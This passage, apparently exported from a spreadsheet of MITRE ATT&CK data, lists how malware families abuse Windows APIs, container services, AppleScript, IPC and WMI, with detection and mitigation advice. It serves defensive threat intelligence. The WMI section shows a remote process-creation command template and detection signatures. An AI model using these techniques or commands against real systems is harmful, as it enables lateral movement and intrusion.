[Misdat](https://attack.mitre.org/software/S0083) has used Windows APIs, including `ExitWindowsEx` and `GetKeyboardType`.(Citation: Cylance Dust Storm) 
Mosquito
[Mosquito](https://attack.mitre.org/software/S0256) leverages the CreateProcess() and LoadLibrary() calls to execute files with the .dll and .exe extensions.(Citation: ESET Turla Mosquito Jan 2018)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can use Native API including &lt;code&gt;CreateProcess&lt;/code&gt; &lt;code&gt;GetProcessById&lt;/code&gt;, and &lt;code&gt;WriteProcessMemory&lt;/code&gt;.(Citation: FireEye NETWIRE March 2019)
Nebulae
[Nebulae](https://attack.mitre.org/software/S0630) has the ability to use &lt;code&gt;CreateProcess&lt;/code&gt; to execute a process.(Citation: Bitdefender Naikon April 2021)
Netwalker
[Netwalker](https://attack.mitre.org/software/S0457) can use Windows API functions to inject the ransomware DLL.(Citation: TrendMicro Netwalker May 2020)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) can use multiple native APIs including `GetKeyState`, `GetForegroundWindow`, `GetWindowThreadProcessId`, and `GetKeyboardLayout`.(Citation: MoustachedBouncer ESET August 2023)
PLEAD
[PLEAD](https://attack.mitre.org/software/S0435) can use `ShellExecute` to execute applications.(Citation: TrendMicro BlackTech June 2017)
PcShare
[PcShare](https://attack.mitre.org/software/S1050) has used a variety of Windows API functions.(Citation: Bitdefender FunnyDream Campaign November 2020)
Pillowmint
[Pillowmint](https://attack.mitre.org/software/S0517) has used multiple native Windows APIs to execute and conduct process injections.(Citation: Trustwave Pillowmint June 2020)
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501)'s first stage has been executed by a call to &lt;code&gt;CreateProcess&lt;/code&gt; with the decryption password in an argument. [PipeMon](https://attack.mitre.org/software/S0501) has used a call to &lt;code&gt;LoadLibrary&lt;/code&gt; to load its installer.(Citation: ESET PipeMon May 2020)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) can use the Windows API functions `GetProcAddress`, `LoadLibrary`, and `CreateProcess` to execute another process.(Citation: Lastline PlugX Analysis)(Citation: Proofpoint TA416 Europe March 2022)
PolyglotDuke
[PolyglotDuke](https://attack.mitre.org/software/S0518) can use &lt;code&gt;LoadLibraryW&lt;/code&gt; and &lt;code&gt;CreateProcess&lt;/code&gt; to load and execute code.(Citation: ESET Dukes October 2019)
Pony
[Pony](https://attack.mitre.org/software/S0453) has used several Windows functions for various purposes.(Citation: Malwarebytes Pony April 2016)	
Prestige
[Prestige](https://attack.mitre.org/software/S1058) has used the `Wow64DisableWow64FsRedirection()` and `Wow64RevertWow64FsRedirection()` functions to disable and restore file system redirection.(Citation: Microsoft Prestige ransomware October 2022) 
Pteranodon
[Pteranodon](https://attack.mitre.org/software/S0147) has used various API calls.(Citation: Microsoft Actinium February 2022)
QUIETCANARY
[QUIETCANARY](https://attack.mitre.org/software/S1076) can call `System.Net.HttpWebRequest` to identify the default proxy configured on the victim computer.(Citation: Mandiant Suspected Turla Campaign February 2023)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use &lt;code&gt;GetProcAddress&lt;/code&gt; to help delete malicious strings from memory.(Citation: ATT QakBot April 2021)
RCSession
[RCSession](https://attack.mitre.org/software/S0662) can use WinSock API for communication including &lt;code&gt;WSASend&lt;/code&gt; and &lt;code&gt;WSARecv&lt;/code&gt;.(Citation: Profero APT27 December 2020)
RDFSNIFFER
[RDFSNIFFER](https://attack.mitre.org/software/S0416) has used several Win32 API functions to interact with the victim machine.(Citation: FireEye FIN7 Oct 2019)
REvil
[REvil](https://attack.mitre.org/software/S0496) can use Native API for execution and to retrieve active services.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can use a variety of API calls to execute shellcode.(Citation: Malwarebytes RokRAT VBA January 2021)
RTM
[RTM](https://attack.mitre.org/software/S0148) can use the &lt;code&gt;FindNextUrlCacheEntryA&lt;/code&gt; and &lt;code&gt;FindFirstUrlCacheEntryA&lt;/code&gt; functions to search for specific strings within browser history.(Citation: ESET RTM Feb 2017)
RainyDay
The file collection tool used by [RainyDay](https://attack.mitre.org/software/S0629) can utilize native API including &lt;code&gt;ReadDirectoryChangeW&lt;/code&gt; for folder monitoring.(Citation: Bitdefender Naikon April 2021)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can use Windows API functions such as &lt;code&gt;WriteFile&lt;/code&gt;, &lt;code&gt;CloseHandle&lt;/code&gt;, and &lt;code&gt;GetCurrentHwProfile&lt;/code&gt; during its collection and file storage operations. [Ramsay](https://attack.mitre.org/software/S0458) can execute its embedded components via &lt;code&gt;CreateProcessA&lt;/code&gt; and &lt;code&gt;ShellExecute&lt;/code&gt;.(Citation: Eset Ramsay May 2020)
Rising Sun
[Rising Sun](https://attack.mitre.org/software/S0448) used dynamic API resolutions to various Windows APIs by leveraging `LoadLibrary()` and `GetProcAddress()`.(Citation: McAfee Sharpshooter December 2018)
RotaJakiro
When executing with non-root permissions, [RotaJakiro](https://attack.mitre.org/software/S1078) uses the the `shmget` API to create shared memory between other known [RotaJakiro](https://attack.mitre.org/software/S1078) processes. [RotaJakiro](https://attack.mitre.org/software/S1078) also uses the `execvp` API to help its dead process "resurrect".(Citation: RotaJakiro 2021 netlab360 analysis)
Royal
[Royal](https://attack.mitre.org/software/S1073) can use multiple APIs for discovery, communication, and execution.(Citation: Cybereason Royal December 2022)
Ryuk
[Ryuk](https://attack.mitre.org/software/S0446) has used multiple native APIs including &lt;code&gt;ShellExecuteW&lt;/code&gt; to run executables,&lt;code&gt;GetWindowsDirectoryW&lt;/code&gt; to create folders, and &lt;code&gt;VirtualAlloc&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, and &lt;code&gt;CreateRemoteThread&lt;/code&gt; for process injection.(Citation: CrowdStrike Ryuk January 2019)
S-Type
[S-Type](https://attack.mitre.org/software/S0085) has used Windows APIs, including `GetKeyboardType`, `NetUserAdd`, and `NetUserDel`.(Citation: Cylance Dust Storm)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) has the ability to leverage API including `GetProcAddress` and `LoadLibrary`.(Citation: GitHub SILENTTRINITY Modules July 2019)
SUNSPOT
[SUNSPOT](https://attack.mitre.org/software/S0562) used Windows API functions such as &lt;code&gt;MoveFileEx&lt;/code&gt; and &lt;code&gt;NtQueryInformationProcess&lt;/code&gt; as part of the [SUNBURST](https://attack.mitre.org/software/S0559) injection process.(Citation: CrowdStrike SUNSPOT Implant January 2021) 
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) can use Windows API calls to gather information from an infected host.(Citation: HP SVCReady Jun 2022)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has used different API calls, including `GetProcAddress`, `VirtualAllocEx`, `WriteProcessMemory`, `CreateProcessA`, and `SetThreadContext`.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) has the ability to call Win32 API functions to determine if `powershell.exe` is running.(Citation: Bitdefender Sardonic Aug 2021) 
SharpDisco
[SharpDisco](https://attack.mitre.org/software/S1089) can leverage Native APIs through plugins including `GetLogicalDrives`.(Citation: MoustachedBouncer ESET August 2023)
ShimRat
[ShimRat](https://attack.mitre.org/software/S0444) has used Windows API functions to install the service and shim.(Citation: FOX-IT May 2016 Mofang)	
ShimRatReporter
[ShimRatReporter](https://attack.mitre.org/software/S0445) used several Windows API functions to gather information from the infected system.(Citation: FOX-IT May 2016 Mofang)
SideTwist
[SideTwist](https://attack.mitre.org/software/S0610) can use &lt;code&gt;GetUserNameW&lt;/code&gt;, &lt;code&gt;GetComputerNameW&lt;/code&gt;, and &lt;code&gt;GetComputerNameExW&lt;/code&gt; to gather information.(Citation: Check Point APT34 April 2021)
Siloscape
[Siloscape](https://attack.mitre.org/software/S0623) makes various native API calls.(Citation: Unit 42 Siloscape Jun 2021)
SodaMaster
[SodaMaster](https://attack.mitre.org/software/S0627) can use &lt;code&gt;RegOpenKeyW&lt;/code&gt; to access the Registry.(Citation: Securelist APT10 March 2021)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) has the ability to respawn itself using &lt;code&gt;ShellExecuteW&lt;/code&gt; and &lt;code&gt;CreateProcessW&lt;/code&gt;.(Citation: BlackBerry CostaRicto November 2020)
StrifeWater
[StrifeWater](https://attack.mitre.org/software/S1034) can use a variety of APIs for execution.(Citation: Cybereason StrifeWater Feb 2022)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) uses the SetSecurityDescriptorDacl API to reduce object integrity levels.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
SynAck
[SynAck](https://attack.mitre.org/software/S0242) parses the export tables of system DLLs to locate and call various Windows API functions.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kasp</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor commands and arguments executed by container services. In Docker, the daemon log provides insight into events at the daemon and container service level. Kubernetes system component logs may also detect activities running in and out of containers in the cluster.
Process Creation
Container administration service activities and executed commands can be captured through logging of process execution with command-line arguments on the container as well as within the underlying host.
Disable or Remove Feature or Program
Remove unnecessary tools and software from containers.
Execution Prevention
Use read-only containers, read-only file systems, and minimal images when possible to prevent the execution of commands.(Citation: Kubernetes Hardening Guide) Where possible, also consider using application control and software restriction tools (such as those provided by SELinux) to restrict access to files, processes, and system calls in containers.(Citation: Kubernetes Security Context)
Limit Access to Resource Over Network
Limit communications with the container service to managed and secured channels, such as local Unix sockets or remote access via SSH. Require secure port access to communicate with the APIs over TLS by disabling unauthenticated access to the Docker API and Kubernetes API Server.(Citation: Docker Daemon Socket Protect)(Citation: Kubernetes API Control Access) In Kubernetes clusters deployed in cloud environments, use native cloud platform features to restrict the IP ranges that are permitted to access to API server.(Citation: Kubernetes Cloud Native Security) Where possible, consider enabling just-in-time (JIT) access to the Kubernetes API to place additional restrictions on access.(Citation: Microsoft AKS Azure AD 2023)
Privileged Account Management
Ensure containers are not running as root by default. In Kubernetes environments, consider defining Pod Security Standards that prevent pods from running privileged containers and using the `NodeRestriction` admission controller to deny the kublet access to nodes and pods outside of the node it belongs to.(Citation: Kubernetes Hardening Guide) (Citation: Kubernetes Admission Controllers)
User Account Management
Enforce authentication and role-based access control on the container service to restrict users to the least privileges required.(Citation: Kubernetes Hardening Guide) When using Kubernetes, avoid giving users wildcard permissions or adding users to the `system:masters` group, and use `RoleBindings` rather than `ClusterRoleBindings` to limit user privileges to specific namespaces.(Citation: Kubernetes RBAC)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) executed [Hildegard](https://attack.mitre.org/software/S0601) through the kubelet API run command and by executing commands on running containers.(Citation: Unit 42 Hildegard Malware)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) was executed through the kubelet API run command and by executing commands on running containers.(Citation: Unit 42 Hildegard Malware)
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) was executed with an Ubuntu container entry point that runs shell scripts.(Citation: Aqua Kinsing April 2020)
Peirates
[Peirates](https://attack.mitre.org/software/S0683) can use `kubectl` or the Kubernetes API to run commands.(Citation: Peirates GitHub)
Siloscape
[Siloscape](https://attack.mitre.org/software/S0623) can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster.(Citation: Unit 42 Siloscape Jun 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Module Load
Monitoring module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of shared modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled, or system modules such that deviation from known module loads may be suspicious
 Limiting module loads to trusted directories, such as &lt;code&gt;%SystemRoot%&lt;/code&gt; and &lt;code&gt;%ProgramFiles%&lt;/code&gt; on Windows, may protect against module loads from unsafe paths.
OS API Execution
Monitor for API calls that may execute malicious payloads via loading shared modules.
Execution Prevention
Identify and block potentially malicious software executed through this technique by using application control tools capable of preventing unknown modules from being loaded.
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) uses the LoadLibraryExW() function to load additional modules. (Citation: Cybereason Astaroth Feb 2019)
Attor
[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can execute additional plugins by loading the respective DLLs.(Citation: ESET Attor Oct 2019)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has loaded and executed DLLs in memory during runtime on a victim machine.(Citation: US-CERT BLINDINGCAN Aug 2020)
BOOSTWRITE
[BOOSTWRITE](https://attack.mitre.org/software/S0415) has used the DWriteCreateFactory() function to load additional modules.(Citation: FireEye FIN7 Oct 2019)
Bumblebee
 [Bumblebee](https://attack.mitre.org/software/S1039) can use `LoadLibrary` to attempt to execute GdiPlus.dll.(Citation: Medium Ali Salem Bumblebee April 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can load DLLs.(Citation: Prevailion DarkWatchman 2021)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) contains a function that calls &lt;code&gt;LoadLibrary&lt;/code&gt; and &lt;code&gt;GetProcAddress&lt;/code&gt;.(Citation: CyberBit Dtrack)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader can call the &lt;code&gt;load()&lt;/code&gt; function to load the [FoggyWeb](https://attack.mitre.org/software/S0661) dll into an Application Domain on a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can load and call DLL functions.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)
KillDisk
[KillDisk](https://attack.mitre.org/software/S0607) loads and executes functions from a DLL.(Citation: Trend Micro KillDisk 1)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) had used AutoIt to load and execute the DLL payload.(Citation: Fortinet Metamorfo Feb 2020) 
OSX_OCEANLOTUS.D
For network communications, [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) loads a dynamic library (`.dylib` file) using `dlopen()` and obtains a function pointer to execute within that shared library using `dlsym()`.(Citation: Unit42 OceanLotus 2017)
PUNCHBUGGY
[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can load a DLL using the LoadLibrary API.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501) has used call to &lt;code&gt;LoadLibrary&lt;/code&gt; to load its installer. [PipeMon](https://attack.mitre.org/software/S0501) loads its modules using reflective loading or custom shellcode.(Citation: ESET PipeMon May 2020)
RotaJakiro
[RotaJakiro](https://attack.mitre.org/software/S1078) uses dynamically linked shared libraries (`.so` files) to execute additional functionality using `dlopen()` and `dlsym()`.(Citation: RotaJakiro 2021 netlab360 analysis)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) calls LoadLibrary then executes exports from a DLL.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject the &lt;code&gt;LoadLibrary&lt;/code&gt; call template DLL into running processes.(Citation: Kaspersky TajMahal April 2019)
gh0st RAT
[gh0st RAT](https://attack.mitre.org/software/S0032) can load DLLs into memory.(Citation: Gh0stRAT ATT March 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor logs generated by serverless execution for unusual activity. For example, in Exchange environments emails sent by Power Automate via the Outlook 365 connector include the phrase ‘Power App’ or ‘Power Automate’ in the SMTP header 'x-ms-mail-application.'(Citation: Power Automate Email Exfiltration Controls)
Cloud Service Modification
Monitor the creation and modification of serverless resources such as functions and workflows.
User Account Management
Remove permissions to create, modify, or run serverless resources from users that do not explicitly require them.
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can create malicious Lambda functions.(Citation: GitHub Pacu)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may abuse AppleScript for execution. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used.  Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
OS API Execution
Monitor for execution of AppleScript through &lt;code&gt;osascript&lt;/code&gt; and usage of the &lt;code&gt;NSAppleScript&lt;/code&gt; and &lt;code&gt;OSAScript&lt;/code&gt; APIs that may be related to other suspicious behavior occurring on the system.
Process Creation
Monitor for newly executed processes that may abuse AppleScript for execution. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
Code Signing
Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing.(Citation: applescript signing) This subjects AppleScript code to the same scrutiny as other .app files passing through Gatekeeper.
Execution Prevention
Use application control where appropriate.
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) can use AppleScript to inject malicious JavaScript into a browser.(Citation: MacKeeper Bundlore Apr 2019)
Dok
[Dok](https://attack.mitre.org/software/S0281) uses AppleScript to create a login item for persistence.(Citation: objsee mac malware 2017)
ThiefQuest
[ThiefQuest](https://attack.mitre.org/software/S0595) uses [AppleScript](https://attack.mitre.org/techniques/T1059/002)'s &lt;code&gt;osascript -e&lt;/code&gt; command to launch [ThiefQuest](https://attack.mitre.org/software/S0595)'s persistence via [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004). (Citation: wardle evilquest parti)
macOS.OSAMiner
[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `osascript` to call itself via the `do shell script` command in the [Launch Agent](https://attack.mitre.org/techniques/T1543/001) `.plist` file.(Citation: SentinelLabs reversing run-only applescripts 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may rely upon specific actions by a user in order to gain execution.
Command Execution
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Container Creation
Monitor for newly constructed containers that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.
Container Start
Monitor for the activation or invocation of a container (ex: docker start or docker restart)
File Creation
Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).
Image Creation
Monitor for newly constructed image that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.
Instance Creation
Monitor for newly constructed instances that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.
Instance Start
Monitor for the activation or invocation of an instance (ex: instance.start within GCP Audit Logs)
Network Connection Creation
Monitor for newly constructed web-based network connections that are sent to malicious or suspicious destinations (e.g. destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, .SCF, HTA, MSI, DLLs, or msiexec.exe).
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious detinations (e.g. destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, .SCF, HTA, MSI, DLLs, or msiexec.exe).
Process Creation
Monitor for newly executed processes that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent executable files from running unless they meet a prevalence, age, or trusted list criteria and to prevent Office applications from creating potentially malicious executable content by blocking malicious code from being written to disk. Note: cloud-delivered protection must be enabled to use certain rules. (Citation: win10_asr)
Execution Prevention
Application control may be able to prevent the running of executables masquerading as other files.
Network Intrusion Prevention
If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity.
Restrict Web-Based Content
If a link is being visited by a user, block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some download scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious files.
User Training
Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events.
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has recruited target organization employees or contractors who provide credentials and approve an associated MFA prompt, or install remote management software onto a corporate workstation, allowing [LAPSUS$](https://attack.mitre.org/groups/G1004) to take control of an authenticated system.(Citation: MSTIC DEV-0537 Mar 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
Process Access
Monitor for processes making abnormal calls to higher privileged processes, such as a user application connecting to a VPN service.(Citation: versprite xpc vpn)
Process Creation
Monitor for newly executed processes that are associated with abuse of IPC mechanisms
Script Execution
Monitor for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Application Developer Guidance
Enable the Hardened Runtime capability when developing applications. Do not include the &lt;code&gt;com.apple.security.get-task-allow&lt;/code&gt; entitlement with the value set to any variation of true. 
Application Isolation and Sandboxing
Ensure all COM alerts and Protected View are enabled.(Citation: Microsoft Protected View)
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs.(Citation: Microsoft ASR Nov 2017)(Citation: Enigma Reviving DDE Jan 2018)
Disable or Remove Feature or Program
Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution. (Citation: Microsoft DDE Advisory Nov 2017)(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: GitHub Disable DDEAUTO Oct 2017) Microsoft also created, and enabled by default, Registry keys to completely disable DDE execution in Word and Excel.(Citation: Microsoft ADV170021 Dec 2017)
Privileged Account Management
Modify Registry settings (directly or using Dcomcnfg.exe) in `HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\AppID\\{AppID_GUID}` associated with the process-wide security of individual COM applications.(Citation: Microsoft Process Wide Com Keys)
Modify Registry settings (directly or using Dcomcnfg.exe) in `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole` associated with system-wide security defaults for all COM applications that do no set their own process-wide security.(Citation: Microsoft System Wide Com Keys) (Citation: Microsoft COM ACL)
Software Configuration
Consider disabling embedded files in Office programs, such as OneNote, that do not work with Protected View.(Citation: Enigma Reviving DDE Jan 2018)(Citation: GitHub Disable DDEAUTO Oct 2017)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to create a pipe to enable inter-process communication.(Citation: Trend Micro Cyclops Blink March 2022)
HyperStack
[HyperStack](https://attack.mitre.org/software/S0537) can connect to the IPC$ share on remote machines.(Citation: Accenture HyperStack October 2020)
RotaJakiro
When executing with non-root permissions, [RotaJakiro](https://attack.mitre.org/software/S1078) uses the the `shmget API` to create shared memory between other known [RotaJakiro](https://attack.mitre.org/software/S1078) processes. This allows processes to communicate with each other and share their PID.(Citation: RotaJakiro 2021 netlab360 analysis)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) has the ability to move data between its kernel and user mode components, generally using named pipes.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that are used to perform remote behavior
Network Connection Creation
Monitor network traffic for WMI connections for potential use to remotely edit configuration, start services, or query files. When remote WMI requests are over RPC it connects to a DCOM interface within the RPC group &lt;code&gt;netsvcs&lt;/code&gt;. To detect this activity, a sensor is needed at the network level that can decode RPC traffic or on the host where the communication can be detected more natively, such as Event Tracing for Windows. Using wireshark/tshark decoders, the WMI interfaces can be extracted so that WMI activity over RPC can be detected. Although the description details how to detect remote WMI precisely, a decent estimate has been to look for the string RPCSS within the initial RPC connection on 135/tcp. It returns a superset of this activity, and will trigger on all DCOM-related services running within RPC, which is likely to also be activity that should be detected between hosts. More about RPCSS at : rpcss_dcom_interfaces.html
After the WMI connection has been initialized, a process can be remotely launched using the command: &lt;code&gt;wmic /node:"&lt;hostname&gt;" process call create "&lt;command line&gt;"&lt;/code&gt;, which is detected in the third Detection Pseudocode. 
This leaves artifacts at both a network (RPC) and process (command line) level. When &lt;code&gt;wmic.exe&lt;/code&gt; (or the schtasks API) is used to remotely create processes, Windows uses RPC (135/tcp) to communicate with the the remote machine.
After RPC authenticates, the RPC endpoint mapper opens a high port connection, through which the schtasks Remote Procedure Call is actually implemented. With the right packet decoders, or by looking for certain byte streams in raw data, these functions can be identified.
When the command line is executed, it has the parent process of &lt;code&gt;C:\windows\system32\wbem\WmiPrvSE.exe&lt;/code&gt;. This analytic looks for these two events happening in sequence, so that the network connection and target process are output.
Certain strings can be identifiers of the WMI by looking up the interface UUID for &lt;code&gt;IRemUnknown2&lt;/code&gt; in different formats
- UUID &lt;code&gt;00000143-0000-0000-c000-000000000046&lt;/code&gt; (decoded)
- Hex &lt;code&gt;43 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46&lt;/code&gt; (raw)
- ASCII &lt;code&gt;CF&lt;/code&gt; (printable text only)
This identifier is present three times during the RPC request phase. Any sensor that has access to the byte code as raw, decoded, or ASCII could implement this analytic. The transfer syntax is
- UUID &lt;code&gt;8a885d04-1ceb-11c9-9fe8-08002b104860&lt;/code&gt; (decoded)
- Hex &lt;code&gt;04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60&lt;/code&gt; (raw)
- ASCII &lt;code&gt;`]+H``&lt;/code&gt; (printable text only)
Thus, a great ASCII based signature is
- &lt;code&gt;*CF*]+H*CF*CF*host*"&lt;/code&gt;
Note: To detect WMI over RPC (using DCOM), a sensor needs to exist that has the insight into individual connections and can actually decode and make sense of RPC traffic. Specifically, WMI can be detected by looking at RPC traffic where the target interface matches that of WMI, which is IRemUnknown2. Look for instances of the WMI querying in network traffic, and find the cases where a process is launched immediately after a connection is seen. This essentially merges the request to start a remote process via WMI with the process execution. If other processes are spawned from wmiprvse.exe in this time frame, it is possible for race conditions to occur, and the wrong process may be merged. If this is the case, it may be useful to look deeper into the network traffic to see if the desired command can be extracted.
&lt;h4&gt; Analytic 1 - Remote WMI over RPC&lt;/h4&gt;
&lt;code&gt;wmi_flow = filter network_flow where (dest_port == 135 and proto_info.rpc_interface == "IRemUnknown2")&lt;/code&gt;
&lt;h4&gt; Analytic 2 : Remotely Launched Executables via WMI&lt;/h4&gt;
&lt;code&gt;wmi_children = filter processes where (parent_process == “wmiprvse.exe”)
wmi_flow = filter network flow where (src_port ≥ 49152 and dest_port ≥ 49152 and proto_info.rpc_interface == “IRemUnknown2”)
remote_wmi_process = join wmi_children, wmi_flow where (wmi_flow.time &lt; wmi_children.time &lt; wmi_flow.time + 1 sec and wmi_flow.hostname == wmi_children.hostname&lt;/code&gt;
Process Creation
Monitor for newly constructed processes and/or command-lines of "wmic”. If the command line utility &lt;code&gt;wmic.exe&lt;/code&gt; is used on the source host, then it can additionally be detected on an analytic. The command line on the source host is constructed into something like &lt;code&gt;wmic.exe /node:"\&lt;hostname\&gt;" process call create "\&lt;command line\&gt;"&lt;/code&gt;. It is possible to also connect via IP address, in which case the string &lt;code&gt;"\&lt;hostname\&gt;"&lt;/code&gt; would instead look like IP Address. Processes can be created remotely via WMI in a few other ways, such as more direct API access or the built-in utility PowerShell.
Note: Event IDs are for Sysmon (Event ID 10 - process access) and Windows Security Log (Event ID 4688 - a new process has been created). 
Besides executing arbitrary processes, wmic.exe can also be used to executed data stored in NTFS alternate data streams [NTFS File Attributes](https://attack.mitre.org/techniques/T1564/004).
Looks for instances of wmic.exe as well as the substrings in the command line:
- process call create
- /node:
&lt;h4&gt; Analytic 1 : Create Remote Process via WMIC&lt;/h4&gt;
&lt;code&gt; processes = filter processes where ((event_id="10" OR event_id="4688") AND exe == "wmic.exe" AND command_line == "* process call create *")&lt;/code&gt;
WMI Creation
Monitor for newly constructed WMI objects that will execute malicious commands and payloads. 
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to block processes created by WMI commands from running. Note: many legitimate tools and applications utilize WMI for command execution. (Citation: win10_asr)
Execution Prevention
Use application control configured to block execution of &lt;code&gt;wmic.exe&lt;/code&gt; if it is not required for a given system or network to prevent potential misuse by adversaries. For example, in Windows 10 and Windows Server 2016 and above, Windows Defender Application Control (WDAC) policy rules may be applied to block the &lt;code&gt;wmic.exe&lt;/code&gt; application and to prevent abuse.(Citation: Microsoft WDAC)
Privileged Account Management
Prevent credential overlap across systems of administrator and privileged accounts. (Citation: FireEye WMI 2015)
User Account Management
By default, only administrators are allowed to connect remotely using WMI. Restrict other users who are allowed to connect, or disallow all users to connect remotely to WMI.
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), WMI in scripts were used for remote execution and system surveys. (Citation: Dragos Crashoverride 2018)
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `wmic` and `rundll32` to load [Cobalt Strike](https://attack.mitre.org/software/S0154) onto a target host.(Citation: DFIR Conti Bazar Nov 2021)
C0018
